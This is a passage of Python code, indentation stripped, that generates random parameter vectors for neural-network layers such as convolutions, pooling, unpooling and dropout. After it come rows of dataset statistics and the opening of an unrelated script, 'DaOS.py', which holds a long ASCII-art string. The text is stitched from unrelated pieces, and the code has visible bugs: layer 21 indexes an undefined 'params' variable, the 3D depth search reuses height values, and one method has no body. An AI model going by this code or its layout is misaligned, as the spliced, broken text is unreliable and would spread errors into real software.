dilation_depth,dilation_height,dilation_width = dilation_size,dilation_size,dilation_size
if(pool_type == 1):
dilation_depth,dilation_height,dilation_width = 1,1,1
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_depth,stride_height,stride_width = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
#计算output_size
out_depth = (input_depth + 2*padding_depth - dilation_depth*(kernel_size_depth-1) - 1)/(stride_depth) + 1
out_height = (input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1
out_width = (input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1
output_size = [input_size[0],input_channels,out_depth,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[3]
in_height = input_size[3]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
out_depth = output_size[2]
in_depth = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_depth + 2*p - dilation_size*(kernel_size-1) - 1)/(out_depth - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_depth = padding_size
stride_depth = stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_depth = kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,\
stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type]]
elif(layer_id == 9):
input_channels = input_size[1]
input_length = input_size[2]
kernel_size,stride_size,padding_size = [0 for index in range(3)]
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
padding_size = random.randint(0,kernel_size)
#计算output_size
out_length = (input_length-1)*stride_size - 2*padding_size + kernel_size
output_size = [input_size[0],input_channels,out_length]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_length = output_size[2]
input_length = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size + out_length) / (input_length-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
return [int(i) for i in input_size+output_size+[kernel_size,stride_size,padding_size]]
# return nn.MaxUnpool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),padding=(padding_height, padding_width))
# return nn.MaxUnpool1d(kernel_size = kernel_size, stride=stride, padding=padding)
elif(layer_id == 10):
input_channels = input_size[1]
input_height = input_size[2]
input_width = input_size[3]
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width = [0 for index in range(6)]
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_height,padding_width = padding_size,padding_size
#计算output_size
out_height = (input_height-1)*stride_height - 2*padding_height + kernel_size_height
out_width = (input_width-1)*stride_width - 2*padding_width + kernel_size_width
output_size = [input_size[0],input_channels,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[2]
in_height = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size_height + out_height) / (input_height-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width]]
# return nn.MaxUnpool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),padding=(padding_height, padding_width))
elif(layer_id == 11):
input_channels = input_size[1]
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width = [0 for index in range(9)]
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_depth,stride_height,stride_width = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
#计算output_size
out_depth = (input_depth-1)*stride_depth - 2*padding_depth + kernel_size_depth
out_height = (input_height-1)*stride_height - 2*padding_height + kernel_size_height
out_width = (input_width-1)*stride_width - 2*padding_width + kernel_size_width
output_size = [input_size[0],input_channels,out_depth,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[3]
in_height = input_size[3]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size_height + out_height) / (input_height-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
out_depth = output_size[2]
in_depth = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for padding in range(0,int(kernel_size/2)+1):
stride_size = (2*padding - kernel_size_height + out_height) / (input_height-1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = padding
padding_depth = padding_size
stride_depth = stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_depth = kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width]]
elif(layer_id == 12):
pool_type = random.randint(0,1)
if(output_size==None):
return input_size + input_size + [pool_type]
else:
return input_size + output_size + [pool_type]
elif(layer_id == 13):
pool_type = random.randint(0,1)
if(output_size==None):
return input_size + input_size + [pool_type]
else:
return input_size + output_size + [pool_type]
elif(layer_id == 14):
pool_type = random.randint(0,1)
if(output_size==None):
return input_size + input_size + [pool_type]
else:
return input_size + output_size + [pool_type]
elif(layer_id == 15):
num_features = input_size[1]
return input_size + [num_features]
elif(layer_id == 16):
num_features = input_size[1]
return input_size + [num_features]
elif(layer_id == 17):
num_features = input_size[1]
return input_size + [num_features]
elif(layer_id == 18):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 19):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 20):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 21):
return input_size+output_size
elif(layer_id == 22):
activation_type = random.randint(1,4)
length = input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
if(activation_type == 1):
return [input_size[0],length] + [1,0,0,0]
elif(activation_type == 2):
return [input_size[0],length] + [0,1,0,0]
elif(activation_type == 3):
return [input_size[0],length] + [0,0,1,0]
else:
return [input_size[0],length] + [0,0,0,1]
#由于add和concat不是实际的神经网络层,随便返回一个神经网络层
elif(layer_id == 23):
length = input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
return [input_size[0],length]+[out_channels]
elif(layer_id == 24):
length = input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
return [input_size[0],length]+[add_num]
elif(layer_id == 25):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
elif(layer_id == 26):
probability = self.prob_random([0.1,0.2,0.3,0.4,0.5],[0.2 for i in range(5)])
return input_size+[probability]
def get_net_input_size(self):
if(self.dimension == 1):
return [1,1,random.randint(100,10000)]
elif(self.dimension == 2):
return [1,3,224,224]
else:
pic_edge_length = random.randint(28,112)
video_frames = random.randint(15,80)
return [1,random.randint(1,3),video_frames,pic_edge_length,pic_edge_length]
def get_layer_output_size(self,params,input_size):
'''
根据一层的输入尺寸,得到该层的输出尺寸
params:list
input_size:list
return list
'''
def prob_random(self,arr1,arr2):
'''
指定概率,获取随机数
'''
assert len(arr1) == len(arr2), "Length does not match."
# assert sum(arr2) == 1 , "Total rate is not 1."
sup_list = [len(str(i).split(".")[-1]) for i in arr2]
top = 10 ** max(sup_list)
new_rate = [int(i*top) for i in arr2]
rate_arr = []
for i in range(1,len(new_rate)+1):
rate_arr.append(sum(new_rate[:i]))
rand = random.randint(1,top)
data = None
for i in range(len(rate_arr)):
if rand <= rate_arr[i]:
data = arr1[i]
break
return data
def get_common_divisor(self,a,b):
'''
获得两个数的所有公约数
'''
common_divisor_list = [1]
for i in range(2,max(a,b)):
if(a%i == 0 and b%i == 0):
common_divisor_list.append(i)
return common_divisor_list
def get_link_vector(self,link_list,target_layer_index):
'''
生成一个节点的连接向量
target_layer_index表示该节点在layer_id中的数组下标
'''
link_vector = [0 for i in range(target_layer_index+1)]
for i in range(0,len(link_list)):
if(link_list[i] == -1):
#表示接收初始输入
link_vector[target_layer_index] = 1
else:
link_vector[link_list[i]] = 1
return link_vector
def get_params_length(self,layer_id):
'''
获取不同层参数向量长度
'''
get_params_length_dic = {
0:13,
1:19,
2:25,
3:14,
4:20,
5:26,
6:11,
7:17,
8:23,
9:9,
10:14,
11:19,
12:7,
13:9,
14:11,
15:4,
16:5,
17:6,
18:4,
19:5,
20:6,
21:4,
22:6,
23:3,
24:3,
25:5,
26:6,
}
return get_params_length_dic[layer_id]
def get_params_num(self,layer_id,params_list):
'''
计算一个层的参数数量
'''
# print(layer_id,params_list)
if layer_id == 0:
input_channels,output_channels,kernel_height,kernel_width = params_list[1],params_list[5],params_list[10],params_list[11]
return input_channels*kernel_height*kernel_width*output_channels
elif layer_id == 1:
input_channels,output_channels,kernel_length = params_list[1],params_list[4],params_list[8]
return input_channels*output_channels*kernel_length
elif layer_id == 2:
input_channels,output_channels,kernel_size_depth,kernel_size_height,kernel_size_width = params_list[1],params_list[6],params_list[12],params_list[13],params_list[14]
return input_channels*output_channels*kernel_size_depth*kernel_size_height*kernel_size_width
elif layer_id == 3:
input_channels,output_channels,kernel_height,kernel_width = params_list[1],params_list[5],params_list[10],params_list[11]
return input_channels*kernel_height*kernel_width*output_channels
elif layer_id == 4:
input_channels,output_channels,kernel_length = params_list[1],params_list[4],params_list[8]
return input_channels*output_channels*kernel_length
elif layer_id == 5:
input_channels,output_channels,kernel_size_depth,kernel_size_height,kernel_size_width = params_list[1],params_list[6],params_list[12],params_list[13],params_list[14]
return input_channels*output_channels*kernel_size_depth*kernel_size_height*kernel_size_width
elif layer_id == 6:
return 0
elif layer_id == 7:
return 0
elif layer_id == 8:
return 0
elif layer_id == 9:
return 0
elif layer_id == 10:
return 0
elif layer_id == 11:
return 0
elif layer_id == 12:
return 0
elif layer_id == 13:
return 0
elif layer_id == 14:
return 0
elif layer_id == 15:
#不考虑批标准化层的可训练参数数量
return 0
elif layer_id == 16:
#不考虑批标准化层的可训练参数数量
return 0
elif layer_id == 17:
#不考虑批标准化层的可训练参数数量
return 0
elif layer_id == 18:
return 0
elif layer_id == 19:
return 0
elif layer_id == 20:
return 0
elif layer_id == 21:
input_length,output_length = params[1,3]
return input_length*(output_length+1)
elif layer_id == 22:
return 0
elif layer_id == 23:
return 0
elif layer_id == 24:
return 0
elif layer_id == 25:
return 0
elif layer_id == 26:
return 0
def prob_random(arr1,arr2):
'''
指定概率,获取随机数
'''
assert len(arr1) == len(arr2), "Length does not match."
# assert sum(arr2) == 1 , "Total rate is not 1."
sup_list = [len(str(i).split(".")[-1]) for i in arr2]
top = 10 ** max(sup_list)
new_rate = [int(i*top) for i in arr2]
rate_arr = []
for i in range(1,len(new_rate)+1):
rate_arr.append(sum(new_rate[:i]))
rand = random.randint(1,top)
data = None
for i in range(len(rate_arr)):
if rand <= rate_arr[i]:
data = arr1[i]
break
return data
def make_net_data():
count = 0
while(1):
stream_num = 1
block_num = random.randint(8,24)
large = random.randint(0,1)
try:
dim = 2
print(stream_num,block_num,large)
vg = VectorGenerator(dimension=dim,block_num=block_num,stream_num=stream_num,large = large)
vg.make_net()
if not validate_NN(vg,dim):
stream_num = 1
block_num = random.randint(8,24)
continue
count+=1
print('计数',count)
except Exception as e:
print(e)
continue
make_net_data()
| 42.460115
| 285
| 0.621696
| 22,548
| 162,877
| 4.180282
| 0.026654
| 0.083071
| 0.052198
| 0.03779
| 0.894936
| 0.870896
| 0.846133
| 0.824098
| 0.811717
| 0.797373
| 0
| 0.044361
| 0.269664
| 162,877
| 3,836
| 286
| 42.460115
| 0.747947
| 0.149217
| 0
| 0.800774
| 0
| 0
| 0.002892
| 0
| 0
| 0
| 0
| 0
| 0.006576
| 1
| 0.014313
| false
| 0
| 0.008897
| 0
| 0.075048
| 0.004255
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6952c73101fec8321007cd8a6e745002864a6e99
| 72,643
|
py
|
Python
|
DaOS.py
|
DantaNotEpic/daOS
|
5146f2f1634e2086aaefa86117c27ddc47ee3d5f
|
[
"Apache-2.0"
] | 1
|
2021-04-05T16:04:01.000Z
|
2021-04-05T16:04:01.000Z
|
DaOS.py
|
DantaNotEpic/daOS
|
5146f2f1634e2086aaefa86117c27ddc47ee3d5f
|
[
"Apache-2.0"
] | 1
|
2021-04-05T16:09:39.000Z
|
2021-04-05T16:11:30.000Z
|
DaOS.py
|
gianxddddd/daOS
|
98a8ef6b72b9f80d9104f8e7056b5f338d070867
|
[
"Apache-2.0"
] | 2
|
2021-04-05T16:00:59.000Z
|
2021-04-05T16:04:05.000Z
|
import time
daDesktop = """\MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmyyyyyho+++++++dMMMNymMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmNMmmmmmh/-y+:ohdyyyyyyddddddddNMMMh+oMMMMMMMMMMMMMMMMMMMMMMMNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNMMNNdmMMMMMNhdMMMMMdyMMMMMmdMmmmmmmmmNNmNNMMMMMMMMMMMMMMMMMMMM+/mMMMNo://s/sddddoomo////NydmdNNNNNNNmNNMMMMMMMMNNMMMMMMMMMMMMMN+o+////dNs++/+mMMhydmMMMMysmm/++/oMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNyyyyyyo+::sy::-+MMMMMMmmMMMMMNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNmNNmsydmmmmddddmdmddddddddddddmhdmdmmmmmmmmNNNNmNNNmmmmmmmmmmmmmNmdhmdyyyyyymNmdhssNMh:/:oNMMMNyNNyss++mMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
